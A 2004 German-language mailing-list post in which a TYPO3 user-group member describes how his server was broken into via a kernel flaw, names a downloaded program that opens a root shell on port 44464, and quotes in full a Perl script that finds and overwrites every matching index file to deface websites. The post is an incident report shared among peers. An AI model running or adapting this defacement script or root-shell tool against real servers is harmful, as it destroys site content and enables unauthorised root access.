AW: [Typo3-UG Oesterreich] OT: Angriffe gegen Tuga-Members

Christian Kurta kurta at typoheads.com
Mon Apr 26 17:36:15 CEST 2004

So.
jetzt sind wir der sache ein bisschen näher gekommen.

So wars bei uns: (Bei einem anderen Tuga Mitglied war's über apache und nicht
über den kernel!)

Also: Eingebrochen wurde bei uns über dieses Kernel-Backdoor (UND NICHT ÜBER
APACHE!):
http://www.heise.de/newsticker/meldung/43341

Dann wurde dieses programm ausgeführt:
http://www.fdlsk8.hpg.ig.com.br/cgi.c

Dieses Proggy macht auf Port 44464 eine Rootshell auf.

Dann wurde dieses Perl-Script gestartet, damit alle dateien überschrieben
wurden:
#!/usr/bin/perl
$ARGC=@ARGV;
print "[-] IndexOver v0.2 by shellc0de\n";
if ($ARGC!=3){
  print "  Uso: $0 <dir_dos_sites> <arquivo_procurado>
<caminho_novo_arquivo>\n";
  die   "  Ex:  $0 /www index.html /tmp/index.htm\n";
}
print "[*] Buscando arquivos...\n";
$cmd="find $ARGV[0]|grep $ARGV[1] |";
open(FIND,"$cmd");
@list=<FIND>;
$quant=@list;
die "[!] Erro: Nenhum Arquivo Encontrado!\n", if ($quant==0);
print "[*] $quant arquivos encontrados\n";
print "[*] Mudando Indexes...\n";
foreach $local(@list){
   system("echo `cat $ARGV[2]` > $local");
}
print "[!] Total: $quant arquivos mudados.\n";

On Mon, 26 Apr 2004 16:10:05 +0200, Tilli Weissenberger wrote

mfg

--
Christian Kurta
kurta at typoheads.com